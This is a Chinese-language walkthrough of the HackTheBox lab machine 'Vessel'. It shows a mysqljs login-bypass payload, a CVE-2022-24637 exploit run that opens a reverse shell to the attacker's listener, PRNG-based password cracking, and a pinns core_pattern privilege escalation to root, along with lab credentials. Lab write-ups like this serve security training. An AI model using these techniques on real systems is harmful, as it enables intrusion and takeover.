Tracks-cloud-Vessel

nmap

└─$ sudo nmap -sS 10.10.11.178 -p- --min-rate=3000                                                                                   

Nmap scan report for 10.10.11.178 
Host is up (0.29s latency).                                       
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh                                                  
80/tcp open  http

User

TCP 80/web

80唯一的功能页面就是login

还有一个contant，但是不会触发任何发包

login内可以注册以及修改密码，这里注册点也无法使用会直接跳报错页。

目录扫描

└─$ dirsearch -u http://10.10.11.178

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Target: http://10.10.11.178/

[04:23:30] Starting: 
[04:23:38] 301 -  171B  - /js  ->  /js/
[04:24:07] 200 -  797B  - /404
[04:24:07] 200 -  778B  - /401
[04:24:07] 200 -  758B  - /500
[04:24:18] 302 -   28B  - /Admin  ->  /login
[04:24:18] 302 -   28B  - /ADMIN  ->  /login
[04:24:18] 302 -   28B  - /admin  ->  /login
[04:24:20] 302 -   28B  - /Admin/  ->  /login
[04:24:20] 302 -   28B  - /admin/  ->  /login
[04:25:12] 301 -  173B  - /css  ->  /css/
[04:25:16] 301 -  173B  - /dev  ->  /dev/                                   
[04:25:30] 301 -  173B  - /img  ->  /img/                                   
[04:25:35] 200 -  329B  - /js/                                              
[04:25:38] 200 -    4KB - /login                                            
[04:25:39] 200 -    4KB - /login/                                           
[04:25:40] 302 -   28B  - /logout  ->  /login                               
[04:25:40] 302 -   28B  - /logout/  ->  /login
[04:26:03] 200 -    1KB - /register                                         
[04:26:04] 200 -    4KB - /reset                                            
[04:26:08] 403 -  277B  - /server-status/                                   
[04:26:08] 403 -  277B  - /server-status

挨个尝试访问，/js 路径做了目录模式但是没有利用价值。

扫目录时候看到有个 /dev 路径相对可疑，进一步尝试

─$ dirsearch -u http://10.10.11.178/dev

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460


Target: http://10.10.11.178/

[04:41:34] Starting: dev/
[04:41:43] 200 -  139B  - /dev/.git/config                                  
[04:41:43] 200 -   25B  - /dev/.git/COMMIT_EDITMSG                          
[04:41:43] 200 -   73B  - /dev/.git/description
[04:41:43] 200 -   23B  - /dev/.git/HEAD                                    
[04:41:44] 200 -    3KB - /dev/.git/index                                   
[04:41:44] 301 -  203B  - /dev/.git/logs/refs  ->  /dev/.git/logs/refs/     
[04:41:44] 200 -  240B  - /dev/.git/info/exclude                            
[04:41:44] 200 -    5KB - /dev/.git/logs/HEAD
[04:41:44] 301 -  215B  - /dev/.git/logs/refs/heads  ->  /dev/.git/logs/refs/heads/
[04:41:44] 200 -    2KB - /dev/.git/logs/refs/heads/master
[04:41:44] 301 -  205B  - /dev/.git/refs/heads  ->  /dev/.git/refs/heads/   
[04:41:44] 200 -   41B  - /dev/.git/refs/heads/master
[04:41:44] 301 -  203B  - /dev/.git/refs/tags  ->  /dev/.git/refs/tags/     

得到一个 .git ，dump下来

gitdump

python3.11 ~/tools/git-dumper/git_dumper.py http://10.10.11.178/dev/ ./dev

翻git log

└─$ git log                               
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date:   Mon Aug 22 10:11:34 2022 -0400

    Potential security fixes

commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date:   Fri Aug 12 14:19:19 2022 -0400

    Security Fixes

commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date:   Wed Aug 10 15:16:56 2022 -0400

    Initial commit

一共更新了两次，查看最初的提交发现 db.js 文件内包含了数据库密码

└─$ git show f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date:   Wed Aug 10 15:16:56 2022 -0400

    Initial commit

diff --git a/config/db.js b/config/db.js
new file mode 100644
index 0000000..5fc0bbd
--- /dev/null
+++ b/config/db.js
@@ -0,0 +1,11 @@
+var mysql = require('mysql');
+
+var connection = {
+        db: {
+        host     : 'localhost',
+        user     : 'default',
+        password : 'daqvACHKvRn84VdVp',
+        database : 'vessel'
+}};
+
+module.exports = connection;
\ No newline at end of file

而在第一次更新时修复了sql注入

└─$ git show edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date:   Fri Aug 12 14:19:19 2022 -0400

    Security Fixes

diff --git a/routes/index.js b/routes/index.js
index be2adb1..0cf479c 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -61,7 +61,7 @@ router.post('/api/login', function(req, res) {
        let username = req.body.username;
        let password = req.body.password;
        if (username && password) {
-               connection.query("SELECT * FROM accounts WHERE username = '" + username + "' AND password = '" + password + "'", function(error, results, fields) {
+               connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields) {
                        if (error) throw error;
                        if (results.length > 0) {
                                req.session.loggedin = true;

最近一次更新中更新了数据库，能看到数据库是 mysqljs

└─$ git show 208167e785aae5b052a4a2f9843d74e733fbd917
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date:   Mon Aug 22 10:11:34 2022 -0400

    Potential security fixes

diff --git a/routes/index.js b/routes/index.js
index 0cf479c..69c22be 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -1,6 +1,6 @@
 var express = require('express');
 var router = express.Router();
-var mysql = require('mysql');
+var mysql = require('mysql'); /* Upgraded deprecated mysqljs */
 var flash = require('connect-flash');
 var db = require('../config/db.js');
 var connection = mysql.createConnection(db.db)

git config 内没有存留的凭据

└─$ cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[user]
        name = Ethan
        email = ethan@vessel.htb

mysqljs 注入

虽然他看起来是修复了原来的sql注入，但是通过关键词 mysqljs 能找到相关的文章

https://flatt.tech/research/posts/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql/

connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields)

由于express包的转换存在问题，导致他在类型转换后有可能会转出除了str之外的其他类型。

以这个 password[password]=1 走到数据库查询return回来的就是1了

通过这种传入object的方式就可以实现控制返回值了。

将cookie塞到cookieedit里，不然他跳转不会自动塞cookie，鉴权会出问题。

dashboard

登录跳转到dashboard

页面上能用的功能点很少，在右上角这里有个分析可以跳转到另外一个子域名

openwebanalytics.vessel.htb

加到host进行访问

openwebanalytics OWA

访问是个owa

搜索历史漏洞，有直接rce的 CVE-2022-24637

https://www.exploit-db.com/exploits/51026

直接打poc了

CVE-2022-24637 get www-data

先check确认一下漏洞

└─$ python3 owa.py  -c openwebanalytics.vessel.htb 10.10.16.14 10086
[SUCCESS] Connected to "http://openwebanalytics.vessel.htb/" successfully!
[ALERT] The webserver indicates a vulnerable version!
[INFO] Attempting to generate cache for "admin" user
[INFO] Attempting to find cache of "admin" user
[INFO] Found temporary password for user "admin": e8ffbc115fedd34e19da20ed4f4b6fd1
[ALERT] The system appears to be vulnerable!

直接打poc弹shell

└─$ python3 owa.py   openwebanalytics.vessel.htb 10.10.16.14 10086 
[SUCCESS] Connected to "http://openwebanalytics.vessel.htb/" successfully!
[ALERT] The webserver indicates a vulnerable version!
[INFO] Attempting to generate cache for "admin" user
[INFO] Attempting to find cache of "admin" user
[INFO] Found temporary password for user "admin": e8ffbc115fedd34e19da20ed4f4b6fd1
[INFO] Changed the password of "admin" to "CF0ai18FJlFiV4mNJx9AV5dnohPwvMun"
[SUCCESS] Logged in as "admin" user
[INFO] Creating log file
[INFO] Wrote payload to log file
[SUCCESS] Triggering payload! Check your listener!
[INFO] You can trigger the payload again at "http://openwebanalytics.vessel.htb/owa-data/caches/iGQiN1kD.php"

拿到shell

└─$ nc -lnvp 10086            
listening on [any] 10086 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.11.178] 47212
whoami
www-data

---

www-data to User

因为从git拿到了80初始web的数据库，所以先尝试链接数据库翻翻

mysql -u default -p -D vessel

# daqvACHKvRn84VdVp

这个用户只能访问 vessel 库，会得到一个admin的password

mysql> select * from accounts;
+----+----------+----------------------------------+------------------+
| id | username | password                         | email            |
+----+----------+----------------------------------+------------------+
|  1 | admin    | k>N4Hf6TmHE(W]Uq"(RCj}V>&=rB$4}< | admin@vessel.htb |
+----+----------+----------------------------------+------------------+
1 row in set (0.00 sec)

但是拿去登录没有用

OWA db

因为他有两个web，所以再查看owa的库内容，通过筛选关键字找到数据库配置文件

www-data@vessel:/var/www$ grep '3306' ./* -r           
./html/vessel/node_modules/async/README.md:Check out [this animation](https://camo.githubusercontent.com/6bbd36f4cf5b35a0f11a96dcd2e97711ffc2fb37/68747470733a2f2f662e636c6f75642e6769746875622e636f6d2f6173736574732f313637363837312f36383130382f62626330636662302d356632392d313165322d393734662d3333393763363464633835382e676966) for how `cargo` and `queue` work.
./html/vessel/node_modules/mysql/Readme.md:* `port`: The port number to connect to. (Default: `3306`)
./html/vessel/node_modules/mysql/Readme.md:For example, if you have an installation of mysql running on localhost:3306
./html/vessel/node_modules/mysql/Readme.md:$ MYSQL_HOST=localhost MYSQL_PORT=3306 MYSQL_DATABASE=node_mysql_test MYSQL_USER=root MYSQL_PASSWORD= FILTER=integration npm test
./html/vessel/node_modules/mysql/lib/ConnectionConfig.js:  this.port               = options.port || 3306;
./html/owa/plugins/db/owa_db_mysql.php:                $port = 3306;
./html/owa/modules/base/classes/installController.php:                owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/classes/settings.php:                'db_port'                            => 3306,
./html/owa/modules/base/classes/settings.php:                    fwrite($handle, str_replace("3306", $config_values['db_port'], $line));
./html/owa/modules/base/classes/installManager.php:                owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/updates/004.php:                owa_coreAPI::debug($this->getMsgAsString(3306));
./html/owa/modules/base/templates/install_config_entry.php:                <input type="text"size="30" name="<?php echo $this->getNs();?>db_port" value="<?php echo ($config['db_port'] ? $config['db_port'] : 3306);?>">
./html/owa/modules/base/templates/install_config_entry.php:            <span class="form-instructions">(optional) The port of your database. Will default to port 3306 if you leave this empty.</span>
./html/owa/conf/messages.php:    3306 => ['headline' => 'Error', 'message' => 'User id already exists for some reason.'],
./html/owa/owa-config.php:define('OWA_DB_PORT', '3306'); // port of database

包含一个数据库密码

...
www-data@vessel:/var/www$ cat ./html/owa/owa-config.php
define('OWA_DB_TYPE', 'mysql'); // options: mysql
define('OWA_DB_NAME', 'owa'); // name of the database
define('OWA_DB_HOST', 'localhost'); // host name of the server housing the database
define('OWA_DB_USER', 'owauser'); // database user
define('OWA_DB_PORT', '3306'); // port of database
define('OWA_DB_PASSWORD', 'Vux8*ZF3rek94%NW'); // database user's password
...

连接数据库查询

mysql> select * from owa_user\G;
*************************** 1. row ***************************
              id: 1
         user_id: admin
        password: $2y$10$MBm4qLJu8PynsUalqLhK9ueAKBXSD6vS5he/hWuUqrZZf389ID/ay
            role: admin
       real_name: default admin
   email_address: admin@vessel.htb
    temp_passkey: 1d90278ef04d2fbcb5476f2fd5ba3518
   creation_date: 1650211659
last_update_date: 1650211659
         api_key: a390cc0247ecada9a2b8d2338b9ca6d2
1 row in set (0.00 sec)

根本跑不出来，继续枚举环境

steven home dir

这个steven的家目录给的权限挺高的

www-data@vessel:/home$ ls
total 16K
drwx------  5 ethan  ethan  4.0K Aug 11  2022 ethan
drwxrwxr-x  3 steven steven 4.0K Aug 11  2022 steven

访问能看到有个 33M的 passwordGenerator，害有个 .notes文件夹，其中包含一个pdf和一张图片。

www-data@vessel:/home/steven$ ls
total 34M
drwxr-xr-x 2 ethan  steven 4.0K Aug 11  2022 .notes
drwxrwxr-x 3 steven steven 4.0K Aug 11  2022 .
drwxr-xr-x 4 root   root   4.0K Aug 11  2022 ..
-rw-r--r-- 1 ethan  steven  33M May  4  2022 passwordGenerator
lrwxrwxrwx 1 root   root      9 Apr 18  2022 .bash_history -> /dev/null
-rw------- 1 steven steven  220 Apr 17  2022 .bash_logout
-rw------- 1 steven steven 3.7K Apr 17  2022 .bashrc
-rw------- 1 steven steven  807 Apr 17  2022 .profile

www-data@vessel:/home/steven/.notes$ ls
total 40K
drwxr-xr-x 2 ethan  steven 4.0K Aug 11  2022 .
drwxrwxr-x 3 steven steven 4.0K Aug 11  2022 ..
-rw-r--r-- 1 ethan  steven  18K Aug 10  2022 notes.pdf
-rw-r--r-- 1 ethan  steven  12K May  2  2022 screenshot.png

把东西拖出来，其中pdf上锁了

而图片则疑似是那个33m的passwordgen的gui截图

可能是生成pdf密码时候截图的

---

passwordGenerator

看下这个执行文件，是个exe

└─$ file passwordGenerator 
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows, 5 sections

用pyinstaller打包的，所以需要再解回去

这里用 pyinstxtractor 还原回pyc

└─$ python3 ~/tools/pyinstxtractor/pyinstxtractor.py  ../passwordGenerator 
[+] Processing ../passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.7 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ../passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

用pycdc还原回py提示版本有问题，看了下确实我的版本有些新了。

└─$ pycdc -c passwordGenerator.pyc -o passwordGenerator.py                
Opening raw code objects requires a version to be specified

所以换 uncompyle6

└─$ uncompyle6  passwordGenerator.pyc -o passwordGenerator.py 

查看gen密码的主要逻辑

└─$ cat passwordGenerator.py

....
    def genPassword(self):
        length = value
        char = index
        if char == 0:
            charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?"
        else:
            if char == 1:
                charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
            else:
                if char == 2:
                    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"
                else:
                    try:
                        qsrand(QTime.currentTime().msec())
                        password = ""
                        for i in range(length):
                            idx = qrand() % len(charset)
                            nchar = charset[idx]
                            password += str(nchar)

                    except:
                        msg = QMessageBox()
                        msg.setWindowTitle("Error")
                        msg.setText("Error while generating password!, Send a message to the Author!")
                        x = msg.exec_()

                return password

这里其实是用了个伪随机，QTime.currentTime().msec()这个会取当天直至现在的毫秒总数最后的三位数，也就是从 0-999 这个范围取值来做种子。

Returns the number of msecs since the start of the day, i.e. since 00:00:00.

那就只需要生成最多1000个密码就能跑出正确的。

因为他这里png的图片上给的32长度以及没有所有字符串，这里编写脚本也用同样的长度和字符串

└─$ cat passwordGenerator.py

from PySide2.QtCore import *

def genPassword(num):
    length = 32
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?"
    qsrand(num)
    password = ""
    for i in range(length):
        idx = qrand() % len(charset)
        nchar = charset[idx]
        password += str(nchar)
    # print(password)
    return password

if '__main__' == __name__:
with open("./wordlist.txt","a") as ww:
		for i in range(0,1000):
		    ww.write(genPassword(i))

因为他QT有部分操作其实是调系统api的，所以这里我用linux一开始生成了字典没跑出来，然后考虑到他的截图是win上截的，又换了win的环境再次生成，发现两者因为系统不同生成的字典也有差异。

这里最后用win的字典跑出来了

└─$ pdf2john notes.pdf 
notes.pdf:$pdf$2*3*128*-1028*1*16*c19b3bb1183870f00d63a766a1f80e68*32*4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000*32*cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86

└─$ hashcat pdfhash ./pass/wordlist.txt
$pdf$2*3*128*-1028*1*16*c19b3bb1183870f00d63a766a1f80e68*32*4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000*32*cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86:YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS

最后得到pdf密码 YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS

---

get User

解锁pdf得到ethan用户密码 b@mPRNSVTjjLKId1T

登录

└─$ ssh ethan@10.10.11.178

ethan@vessel:~$ ls
user.txt
ethan@vessel:~$ cat user*
343c1af6c136a6825c1bb5b40cba9dce

Root

pinns set sysctl

枚举环境时候看到有个 pinns 带 s 位

ethan@vessel:/home/steven/.notes$ find / -perm -u=s 2>/dev/null 
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
/usr/bin/pinns

/home/steven/.notes$ ls -alth /usr/bin/pinns
-rwsr-x--- 1 root ethan 796K Mar 15  2022 /usr/bin/pinns

拖下来看了下

有很多个参数可以传，然后尝试了一个他就报错了，报错还有点奇怪

拿着报错去查了下，发现是个现成的软件

搜漏洞利用找到这个cs的文章

https://www.crowdstrike.com/en-us/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/

看起来就是 pinns 可以配置内核的选项

虽然他这文章利用时候讲的是kubernets下在创建pod时候，因为pinns的value内支持通过+来连接以至于可以一次配置多个内核参数的滥用，但利用上其实也就是针对系统内核直接修改的参数。

比如他这里给的参是

"1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"

重点还是后面这块 kernel.core_pattern 给了参

kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"

搜索这个key值可以得知

https://docs.redhat.com/zh-cn/documentation/openshift_container_platform/4.11/html/nodes/nodes-containers-sysctls

https://www.kernel.org/doc/html/v6.3/admin-guide/sysctl/kernel.html#core-pattern

core-pattern 的配置会在进程崩溃时触发收集，如果和cs文章中一样用|，将会把核心转储传递给|后的程式

比如酱紫，只要有进程崩溃了，就会触发 /home/ethan/test.sh

pinns -s "kernel.core_pattern=|/home/ethan/test.sh

Get Root

所以已经知道怎么利用了

• 1.先改掉kernel.core_pattern
• 2.再就创建个进程
• 3.然后让他崩溃就可以触发恶意脚本了

先改一下

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"
[pinns:e]: Path for pinning namespaces not specified: Invalid argument

报 Path for pinning namespaces not specified: Invalid argument，根据关键字找，发现是少了 -d

带上 -d

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "./"
[pinns:e]: Filename for pinning namespaces not specified: Invalid argument

再查，少了 -f

再带上

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "./" -f "/tmp"
[pinns:e] No namespace specified for pinning

再查是少了个v3要不能为空，这里有好几个参数带上之后都可以 v3++ 所以随便选一个

带上 -c，这次ok了

ethan@vessel:~$ pinns -s "kernel.core_pattern=|/home/ethan/test.sh #"  -d "/" -f "aac"  -c 

查看配置生效情况

ethan@vessel:~$ cat /proc/sys/kernel/core_pattern
|/home/ethan/test.sh #

创建一个 test.sh

ethan@vessel:~$ echo -e '#!/bin/bash\nchmod +s /bin/bash' > test.sh

chmod +777 test.sh

起一个新的连接终端，随便搞个进程，这里我用vim的

ethan@vessel:~$ vim test

查看进程pid

ethan@vessel:~$ ps -axuf|grep test
ethan      28596  0.0  0.0   6300   656 pts/1    S+   12:17   0:00  |           \_ grep --color=auto test
ethan      28592  0.0  0.2  21860  9628 pts/2    S+   12:16   0:00              \_ vim test

让他以崩溃关闭进程

ethan@vessel:~$ kill -SIGSEGV 28592

查看bash的s位，get root

ethan@vessel:~$ ls -alht /bin/bash
-rwsr-sr-x 1 root root 1.2M Apr 18  2022 /bin/bash   
ethan@vessel:~$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/*
707fa02b95dcec879064b3fc6e2ad198

---

唯二思路容易卡住的点，一个是入口的mysqljs粗心的话容易联想不到，以及后面gen wordlist时候需要想到程式最初是在win下生成的密码。